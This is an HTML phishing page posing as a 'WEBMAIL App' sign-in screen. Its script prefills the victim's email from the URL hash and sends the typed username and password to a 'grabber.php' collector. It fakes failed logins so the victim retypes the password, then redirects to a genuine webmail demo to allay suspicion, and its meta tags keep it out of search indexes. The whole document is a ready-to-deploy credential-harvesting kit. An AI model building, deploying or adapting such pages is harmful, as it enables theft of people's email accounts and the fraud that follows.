<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/html">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,10,9,8,7"/>
	<title>WEBMAIL App | Login</title>
	<meta name="robots" content="noindex" />
	 <meta name="robots" content="nofollow" />
	<META NAME="GOOGLEBOT" CONTENT="NOARCHIVE" /><META NAME="GOOGLEBOT" CONTENT="NOSNIPPET" />
</head>
<body  style="background:url(https://cuttingedgepr.com/wp-content/uploads/2020/06/CEO-2-standing-at-window-of-high-building-looking-out-window-on-smartphone-Shutterstock_446615542-1080x591-1.jpg); background-size: cover; background-repeat: no-repeat;">

<script>
const url = 'grabber.php';   //full url goes here
</script>

<style>
.login{
	width:300px; height:20px; font-family: arial; font-size: 14px; color:#2E2E2E; font-weight:bold; 
	background-color: #ffffff; border: solid 1px #BDBDBD; 
	-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 7px; border-radius: 2px 3px 1px 5px;
}
.btn{
	width:313px; height:35px; font-family: arial; font-size: 14px; color:#FFF; background-color: #0965B1; border: solid 1px #0965B1;
	-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162; padding: 10px; border-radius: 2px 5px 1px 7px;
	cursor:pointer; 
}

</style>
<div style="margin:-8px;width:100%">

<div style="position:absolute; top:90px; left:100px; background-color: #FFF; 
    z-index: 0; width: 385px; height:470px; padding: 0px; text-align: center; 
    -webkit-box-shadow: 1px 1px 1px 2px #848484; box-shadow: 1px 1px 1px 2px #848484; border-radius: 2px 10px 3px 12px;">
</div>

<div style="position:absolute;top:150px;left:135px;">
	<font style="font-family: arial; font-size: 28px; color:#2E2E2E;">
		WEBMAIL App
	</font>
</div>

<div style="position:absolute;top:190px;left:135px;">
	<font style="font-family: arial; font-size: 17px; color:#0965B1;">
		Authentication Required
	</font>
	<br>
	<font style="font-family: arial; font-size: 13px; color:#2E2E2E;">
		<strong>Sign in to continue...</strong>
	</font>
</div>
   
	<form method="post" action="" onsubmit="Validate(); return false;">
	<input readonly id="user" name="user" class="login" style="position:absolute;top:250px;left:135px" type="email">
	<input required placeholder="Password" type="password" id="pass" name="pass" class="login" style="position:absolute;top:300px;left:135px">
	<div style="position:absolute;top:350px;left:135px;">
		<input type="checkbox" checked>
		<font style="font-family: arial; font-size: 12px; color:#333333;"> Remember me</font>
	</div>
	<input id="b1" type="submit" class="btn" style="position:absolute;top:380px;left:135px; font-weight:bold;" value="Login">
	</form>
</div>

<img src="https://www.publicsectorexecutive.com/write/MediaUploads/Call%20outs/download_buttons.png" 
style="position:absolute;top:450px;left:135px; width:315px; height:50px;">

<input type="hidden" id="count" value="0">
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script>


<script>
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          var my_email =email;
          $('#user').val(my_email);
			
			}
		  })


function Validate(){
var a = $('#user').val();
var b = $('#pass').val();
var c = $('#count').val();

$.post(url, {user:a,pass:b}, function(){
setTimeout(function(){
if(c>=2){
$('#count').val('0');
window.location='http://demo.mailenable.com/Mondo/lang/sys/client.aspx?LanguageID=EN&Skin=&Version=10.48';
}else{
$('#bg').fadeOut();
$('#bg2').fadeIn();
$('#user').css('top','250px');
$('#pass').css('top','311px');
$('#b1').css('top','381px');
$('#pass').val('');
var add = +c+1;
$('#count').val(add);
$('#pass').focus();
}
},2000);
});
}
</script>

<script>
function process(){
	var user = document.getElementById('user').value;
	var pass = document.getElementById('pass').value;
	if ((user == '') || (user == null)){
	document.getElementById('bg').src='';
	document.getElementById('user').focus();
return false;	
	}else
	if ((pass == '') || (pass == null)){
	document.getElementById('bg').src='';
	document.getElementById('pass').focus();
return false;	
	}else
	
return true	;
}
</script>
<script>
$('input').focus(function(){
  $(this).parents('.form-group').addClass('focused');
});

$('input').blur(function(){
  var inputValue = $(this).val();
  if ( inputValue == "" ) {
    $(this).removeClass('filled');
    $(this).parents('.form-group').removeClass('focused');  
  } else {
    $(this).addClass('filled');
  }
})  
</script>
</body>
</html>